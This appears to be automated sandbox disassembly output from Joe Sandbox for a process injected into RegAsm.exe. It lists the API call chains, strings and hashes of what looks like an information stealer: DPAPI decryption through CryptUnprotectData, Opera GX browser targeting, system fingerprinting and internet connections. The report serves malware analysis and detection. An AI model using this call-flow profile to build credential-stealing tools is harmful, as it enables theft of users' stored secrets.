                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcpy$H_prolog$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                              • String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
                                              • API String ID: 757424748-4027016359
                                              • Opcode ID: 58c1ca1d2e81f216f74bc22b2fe966d1ca671b8a7874bb5cddaf12cf1e7ad9ff
                                              • Instruction ID: 6c19830b9fca59106c9adf72037baeef59eb1e67f48cdb7736ee12230680947a
                                              • Opcode Fuzzy Hash: 58c1ca1d2e81f216f74bc22b2fe966d1ca671b8a7874bb5cddaf12cf1e7ad9ff
                                              • Instruction Fuzzy Hash: 7361B770805158EFDB05EBA4DD26AED7BB6AF15304F00506EF401731E1DB781A98DFA9
                                              APIs
                                              • _EH_prolog.MSVCRT ref: 0040CE11
                                                • Part of subcall function 0041070B: lstrcpy.KERNEL32(00000000,00000000), ref: 00410735
                                                • Part of subcall function 00406CC8: _EH_prolog.MSVCRT ref: 00406CCD
                                                • Part of subcall function 00406CC8: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406CF0
                                                • Part of subcall function 00406CC8: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406D07
                                                • Part of subcall function 00406CC8: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406D23
                                                • Part of subcall function 00406CC8: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406D3D
                                                • Part of subcall function 00406CC8: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406D5E
                                                • Part of subcall function 00411B55: LocalAlloc.KERNEL32(00000040,?,000000C8,00000001,?,00413F3B,00000000,00000000), ref: 00411B6E
                                              • StrStrA.SHLWAPI(00000000,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0040CE64
                                                • Part of subcall function 00406D7F: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,6d@,00000000,00000000), ref: 00406D9F
                                                • Part of subcall function 00406D7F: LocalAlloc.KERNEL32(00000040,6d@,?,?,00406436,00000000,?,?), ref: 00406DAD
                                                • Part of subcall function 00406D7F: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,6d@,00000000,00000000), ref: 00406DC3
                                                • Part of subcall function 00406D7F: LocalFree.KERNEL32(00000000,?,?,00406436,00000000,?,?), ref: 00406DD2
                                              • memcmp.MSVCRT ref: 0040CEA2
                                                • Part of subcall function 00406DE2: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00406E05
                                                • Part of subcall function 00406DE2: LocalAlloc.KERNEL32(00000040,?,?), ref: 00406E1D
                                                • Part of subcall function 00406DE2: LocalFree.KERNEL32(?), ref: 00406E3B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Local$Alloc$CryptFile$BinaryFreeH_prologString$CloseCreateDataHandleReadSizeUnprotectlstrcpymemcmp
                                              • String ID: $DPAPI
                                              • API String ID: 2477620391-1819349886
                                              • Opcode ID: f4f33cf624ca5c3cd2a6191000c0f4e6aa56049a1103b767f7d3402382def4da
                                              • Instruction ID: 2408ed6a17376ed8d3b34ee28a4932b2b5ecf51035a2e12722a0eb3b94b4bde0
                                              • Opcode Fuzzy Hash: f4f33cf624ca5c3cd2a6191000c0f4e6aa56049a1103b767f7d3402382def4da
                                              • Instruction Fuzzy Hash: B8216D72900119EBCF11EBA5CC469EFBB79EF44314F14022BF911F21D1E7399A5486A9
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000000,00000104,00000001,?,?,?,00415E45,00000000,?,Windows: ,00000000,?,0042779C,00000000,?,Work Dir: In memory), ref: 00411447
                                              • HeapAlloc.KERNEL32(00000000,?,?,?,00415E45,00000000,?,Windows: ,00000000,?,0042779C,00000000,?,Work Dir: In memory,00000000,?), ref: 0041144E
                                              • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00000000,?,?,?,00415E45,00000000,?,Windows: ,00000000,?,0042779C,00000000,?), ref: 0041147C
                                              • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,?,?,?,00415E45,00000000,?,Windows: ,00000000,?,0042779C,00000000), ref: 00411498
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$AllocOpenProcessQueryValue
                                              • String ID: Windows 11
                                              • API String ID: 3676486918-2517555085
                                              • Opcode ID: 25477c63717db7a1119d4dbffab179fbef7423128641dff0fa244cb4c1b9eb07
                                              • Instruction ID: 6032db6ee3a41189088d5a21486405f6b76a0e1c1a4dd88e56210a4de2521e27
                                              • Opcode Fuzzy Hash: 25477c63717db7a1119d4dbffab179fbef7423128641dff0fa244cb4c1b9eb07
                                              • Instruction Fuzzy Hash: 69F06879740204FBFB105B91ED0EFEA7B7EEB46B04F101015B701D91A0D7B499949725
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,004109AA,0041145B,?,?,?,00415E45,00000000,?,Windows: ,00000000), ref: 0041094C
                                              • HeapAlloc.KERNEL32(00000000,?,?,?,004109AA,0041145B,?,?,?,00415E45,00000000,?,Windows: ,00000000,?,0042779C), ref: 00410953
                                              • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00000000,?,?,?,004109AA,0041145B,?,?,?,00415E45,00000000,?,Windows: ), ref: 00410971
                                              • RegQueryValueExA.KERNEL32(00000000,CurrentBuildNumber,00000000,00000000,00000000,000000FF,?,?,?,004109AA,0041145B,?,?,?,00415E45,00000000), ref: 0041098C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$AllocOpenProcessQueryValue
                                              • String ID: CurrentBuildNumber
                                              • API String ID: 3676486918-1022791448
                                              • Opcode ID: 26c4f96b02c0b30eba7a4872bec9b4dc88b748c5ffece14e5e107eeddc4036a7
                                              • Instruction ID: 1c55e8032e8fcde8d787a3542ba7420da3729f1f579881fdbb7da51fc9f910cf
                                              • Opcode Fuzzy Hash: 26c4f96b02c0b30eba7a4872bec9b4dc88b748c5ffece14e5e107eeddc4036a7
                                              • Instruction Fuzzy Hash: 19F03075240208BBEB105B91ED0FFEE7A7DEB46B04F101059F701A90A1DBB159809764
                                              APIs
                                              • _EH_prolog.MSVCRT ref: 00417D93
                                                • Part of subcall function 0041070B: lstrcpy.KERNEL32(00000000,00000000), ref: 00410735
                                                • Part of subcall function 00414229: _EH_prolog.MSVCRT ref: 0041422E
                                                • Part of subcall function 004142D8: _EH_prolog.MSVCRT ref: 004142DD
                                                • Part of subcall function 0041077F: lstrlenA.KERNEL32(?,00000000,?,00417DE8,0042770E,0042770B,00000000,00000000,?,004187CB), ref: 00410788
                                                • Part of subcall function 0041077F: lstrcpy.KERNEL32(00000000,00000000), ref: 004107BC
                                                • Part of subcall function 00418AFD: GetProcAddress.KERNEL32(75900000,00417EFC), ref: 00418B11
                                                • Part of subcall function 00418AFD: GetProcAddress.KERNEL32 ref: 00418B28
                                                • Part of subcall function 00418AFD: GetProcAddress.KERNEL32 ref: 00418B3F
                                                • Part of subcall function 00418AFD: GetProcAddress.KERNEL32 ref: 00418B56
                                                • Part of subcall function 00418AFD: GetProcAddress.KERNEL32 ref: 00418B6D
                                                • Part of subcall function 00418AFD: GetProcAddress.KERNEL32 ref: 00418B84
                                                • Part of subcall function 00418AFD: GetProcAddress.KERNEL32 ref: 00418B9B
                                                • Part of subcall function 00418AFD: GetProcAddress.KERNEL32 ref: 00418BB2
                                                • Part of subcall function 00418AFD: GetProcAddress.KERNEL32 ref: 00418BC9
                                                • Part of subcall function 00418AFD: GetProcAddress.KERNEL32 ref: 00418BE0
                                                • Part of subcall function 00418AFD: GetProcAddress.KERNEL32 ref: 00418BF7
                                                • Part of subcall function 00418AFD: GetProcAddress.KERNEL32 ref: 00418C0E
                                                • Part of subcall function 00418AFD: GetProcAddress.KERNEL32 ref: 00418C25
                                                • Part of subcall function 00418AFD: GetProcAddress.KERNEL32 ref: 00418C3C
                                                • Part of subcall function 00418AFD: GetProcAddress.KERNEL32 ref: 00418C53
                                                • Part of subcall function 00418AFD: GetProcAddress.KERNEL32 ref: 00418C6A
                                                • Part of subcall function 00418AFD: GetProcAddress.KERNEL32 ref: 00418C81
                                                • Part of subcall function 00418AFD: GetProcAddress.KERNEL32 ref: 00418C98
                                                • Part of subcall function 00418AFD: GetProcAddress.KERNEL32 ref: 00418CAF
                                                • Part of subcall function 00418AFD: GetProcAddress.KERNEL32 ref: 00418CC6
                                                • Part of subcall function 00418AFD: GetProcAddress.KERNEL32 ref: 00418CDD
                                                • Part of subcall function 00418AFD: GetProcAddress.KERNEL32 ref: 00418CF4
                                                • Part of subcall function 00418AFD: GetProcAddress.KERNEL32 ref: 00418D0B
                                                • Part of subcall function 00418AFD: GetProcAddress.KERNEL32 ref: 00418D22
                                                • Part of subcall function 00411944: _EH_prolog.MSVCRT ref: 00411949
                                                • Part of subcall function 00411944: GetSystemTime.KERNEL32(?,004274F0,00000001,000000C8,00000000,0042770F), ref: 00411989
                                                • Part of subcall function 004107C9: lstrcpy.KERNEL32(00000000,?), ref: 00410802
                                                • Part of subcall function 00410884: _EH_prolog.MSVCRT ref: 00410889
                                                • Part of subcall function 00410884: lstrlenA.KERNEL32(?,?,?,?,?,0041874B,?,?,00427BD8,?,00000000,00427716), ref: 004108B1
                                                • Part of subcall function 00410884: lstrcpy.KERNEL32(00000000), ref: 004108D8
                                                • Part of subcall function 00410884: lstrcat.KERNEL32(?,?), ref: 004108E3
                                                • Part of subcall function 00410810: _EH_prolog.MSVCRT ref: 00410815
                                                • Part of subcall function 00410810: lstrcpy.KERNEL32(00000000), ref: 00410861
                                                • Part of subcall function 00410810: lstrcat.KERNEL32(?,?), ref: 0041086B
                                              • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,00000034,00414359,004187CB,00427712,00000000,?,00000034,00000032,00414423,004125B9,?,00000040,00000064), ref: 00417FA5
                                                • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                • Part of subcall function 00414D3A: _EH_prolog.MSVCRT ref: 00414D3F
                                                • Part of subcall function 00414D3A: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00414F8C
                                                • Part of subcall function 00414315: _EH_prolog.MSVCRT ref: 0041431A
                                                • Part of subcall function 00410742: lstrcpy.KERNEL32(00000000,FEE0858D), ref: 00410768
                                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041808A
                                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004180A6
                                                • Part of subcall function 004112C5: _EH_prolog.MSVCRT ref: 004112CA
                                                • Part of subcall function 004112C5: GetWindowsDirectoryA.KERNEL32(?,00000104,00000001,?,00000000), ref: 004112ED
                                                • Part of subcall function 004112C5: GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,00000000), ref: 0041131F
                                                • Part of subcall function 004112C5: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 00411362
                                                • Part of subcall function 004112C5: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00411369
                                                • Part of subcall function 00403AF5: _EH_prolog.MSVCRT ref: 00403AFA
                                                • Part of subcall function 00403AF5: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00403BA5
                                                • Part of subcall function 00403AF5: StrCmpCA.SHLWAPI(?), ref: 00403BBC
                                                • Part of subcall function 00412F2F: _EH_prolog.MSVCRT ref: 00412F34
                                                • Part of subcall function 00412F2F: StrCmpCA.SHLWAPI(00000000,block,00000000,?,?,0041812A), ref: 00412F56
                                                • Part of subcall function 00412F2F: ExitProcess.KERNEL32 ref: 00412F61
                                                • Part of subcall function 0040F98A: _EH_prolog.MSVCRT ref: 0040F98F
                                                • Part of subcall function 0040F98A: StrCmpCA.SHLWAPI(00000000,?,?,00000000), ref: 0040F9D3
                                                • Part of subcall function 0040F98A: StrCmpCA.SHLWAPI(00000000,?,?,00000000), ref: 0040FA47
                                                • Part of subcall function 00405C89: _EH_prolog.MSVCRT ref: 00405C8E
                                                • Part of subcall function 00405C89: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405D39
                                                • Part of subcall function 00405C89: StrCmpCA.SHLWAPI(?), ref: 00405D50
                                                • Part of subcall function 00412A1B: _EH_prolog.MSVCRT ref: 00412A20
                                                • Part of subcall function 00412A1B: strtok_s.MSVCRT ref: 00412A47
                                                • Part of subcall function 00412A1B: StrCmpCA.SHLWAPI(00000000,004276E8,?,?,?,?,00418314), ref: 00412A78
                                                • Part of subcall function 00412A1B: strtok_s.MSVCRT ref: 00412AD9
                                                • Part of subcall function 00401ED6: _EH_prolog.MSVCRT ref: 00401EDB
                                                • Part of subcall function 0041755C: _EH_prolog.MSVCRT ref: 00417561
                                                • Part of subcall function 0041755C: lstrcat.KERNEL32(?,?), ref: 004175B7
                                                • Part of subcall function 0041755C: lstrcat.KERNEL32(?,00000000), ref: 004175DD
                                                • Part of subcall function 0041755C: lstrcat.KERNEL32(?,?), ref: 004175FD
                                                • Part of subcall function 0041755C: lstrcat.KERNEL32(?,?), ref: 00417611
                                                • Part of subcall function 0041755C: lstrcat.KERNEL32(?), ref: 00417624
                                                • Part of subcall function 0041755C: lstrcat.KERNEL32(?,?), ref: 00417638
                                                • Part of subcall function 0041755C: lstrcat.KERNEL32(?), ref: 0041764B
                                                • Part of subcall function 00417A08: _EH_prolog.MSVCRT ref: 00417A0D
                                                • Part of subcall function 00417A08: lstrcat.KERNEL32(?,00000000), ref: 00417A4F
                                                • Part of subcall function 00417A08: lstrcat.KERNEL32(?), ref: 00417A6E
                                              • Sleep.KERNEL32(000003E8), ref: 004184EF
                                                • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AddressProc$H_prolog$lstrcat$lstrcpy$InternetOpen$DirectoryHeapProcesslstrlenstrtok_s$AllocCreateExitInformationSleepSystemTimeVolumeWindows
                                              • String ID:
                                              • API String ID: 1785958601-0
                                              • Opcode ID: 812b0161f35f310a22b4cd4567578c2b629b3b08ab5bfb52bf8eb0cca6779026
                                              • Instruction ID: ce621b62baef0cb68773ca13e56b2eef027082e8415d82be8283ea880ac54fd0
                                              • Opcode Fuzzy Hash: 812b0161f35f310a22b4cd4567578c2b629b3b08ab5bfb52bf8eb0cca6779026
                                              • Instruction Fuzzy Hash: 74424271D00258AADF10EBA5CD56BDEBBB8AF15304F50459EF50473281DBB81B88CBA7
                                              APIs
                                              • memset.MSVCRT ref: 004024F0
                                                • Part of subcall function 0040245C: memset.MSVCRT ref: 00402481
                                                • Part of subcall function 0040245C: CryptStringToBinaryA.CRYPT32(00000104,00000000,00000001,00000000,?,00000000,00000000), ref: 004024A7
                                                • Part of subcall function 0040245C: CryptStringToBinaryA.CRYPT32(00000104,00000000,00000001,?,?,00000000,00000000), ref: 004024C1
                                              • strcat.MSVCRT(?,00000000,?,?,00000000,00000104), ref: 00402505
                                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00402510
                                              • RtlAllocateHeap.NTDLL(00000000), ref: 00402517
                                                • Part of subcall function 00402308: ??_U@YAPAXI@Z.MSVCRT ref: 0040238D
                                              • memset.MSVCRT ref: 00402540
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: memset$BinaryCryptHeapString$AllocateProcessstrcat
                                              • String ID:
                                              • API String ID: 3248666761-0
                                              • Opcode ID: 262f0a0191609309907e5b4b01de1bc588d47ca40b8ed49772208e87ad256609
                                              • Instruction ID: ec8f99c301dfbf3cc5ab4fe19a51cc316057f8c6932f6dfa418a0bfb0b39eaff
                                              • Opcode Fuzzy Hash: 262f0a0191609309907e5b4b01de1bc588d47ca40b8ed49772208e87ad256609
                                              • Instruction Fuzzy Hash: 82F04FB2D40218B7CB50FBA4DD5AFCA777C9F14305F0000A2BA85F2081DAB89BC48BA4
                                              APIs
                                              • _EH_prolog.MSVCRT ref: 0040E346
                                                • Part of subcall function 0041070B: lstrcpy.KERNEL32(00000000,00000000), ref: 00410735
                                              • StrCmpCA.SHLWAPI(00000000,Opera GX,00426C73,00426C72,?,?,?), ref: 0040E390
                                                • Part of subcall function 00411B09: SHGetFolderPathA.SHELL32(00000000,lB,00000000,00000000,?), ref: 00411B3A
                                                • Part of subcall function 00410810: _EH_prolog.MSVCRT ref: 00410815
                                                • Part of subcall function 00410810: lstrcpy.KERNEL32(00000000), ref: 00410861
                                                • Part of subcall function 00410810: lstrcat.KERNEL32(?,?), ref: 0041086B
                                                • Part of subcall function 004107C9: lstrcpy.KERNEL32(00000000,?), ref: 00410802
                                                • Part of subcall function 00410884: _EH_prolog.MSVCRT ref: 00410889
                                                • Part of subcall function 00410884: lstrlenA.KERNEL32(?,?,?,?,?,0041874B,?,?,00427BD8,?,00000000,00427716), ref: 004108B1
                                                • Part of subcall function 00410884: lstrcpy.KERNEL32(00000000), ref: 004108D8
                                                • Part of subcall function 00410884: lstrcat.KERNEL32(?,?), ref: 004108E3
                                                • Part of subcall function 00410742: lstrcpy.KERNEL32(00000000,FEE0858D), ref: 00410768
                                                • Part of subcall function 00411AC5: _EH_prolog.MSVCRT ref: 00411ACA
                                                • Part of subcall function 00411AC5: GetFileAttributesA.KERNEL32(00000000,?,0040C672,?,00426CA3,?,?), ref: 00411ADE
                                                • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                • Part of subcall function 0040B528: _EH_prolog.MSVCRT ref: 0040B52D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: H_prolog$lstrcpy$lstrcat$AttributesFileFolderPathlstrlen
                                              • String ID: #$Opera GX
                                              • API String ID: 2625060131-1046280356
                                              • Opcode ID: c7c1bf0e04439b128e286dc62e7a6a89c76d931de01ac3b26dc80a4d7c88cac0
                                              • Instruction ID: 5b8b3d9e978eaf9c242c14ddf40b97072724c5bcb0dab3c085722a54aebe5a84
                                              • Opcode Fuzzy Hash: c7c1bf0e04439b128e286dc62e7a6a89c76d931de01ac3b26dc80a4d7c88cac0
                                              • Instruction Fuzzy Hash: 4B029371D0524CEADF05EBE5D946ADEBBB8AF15304F10415EF405632C2DBB82788CBA6
                                              APIs
                                              • ReadFile.KERNEL32(?,?,?,?,?), ref: 1B68FE03
                                              Strings
                                              • delayed %dms for lock/sharing conflict at line %d, xrefs: 1B68FE78
                                              • winRead, xrefs: 1B68FE3D
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID: FileRead
                                              • String ID: delayed %dms for lock/sharing conflict at line %d$winRead
                                              • API String ID: 2738559852-1843600136
                                              • Opcode ID: 5a349499d5d2d4d96555a781347e8b9b51391e60267d3890c376cfd081117e81
                                              • Instruction ID: 70ad568d2676e74c34e99a295684cbcede5b54dea66a9a359391d3bef8185339
                                              • Opcode Fuzzy Hash: 5a349499d5d2d4d96555a781347e8b9b51391e60267d3890c376cfd081117e81
                                              • Instruction Fuzzy Hash: E34113B2A06345ABC704EF64CD819EBB7E9FF94610F84092DF744C7240E771E9188BA2
                                              APIs
                                              • _EH_prolog.MSVCRT ref: 00414057
                                              • lstrlenA.KERNEL32(00000000), ref: 00414074
                                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00414138
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
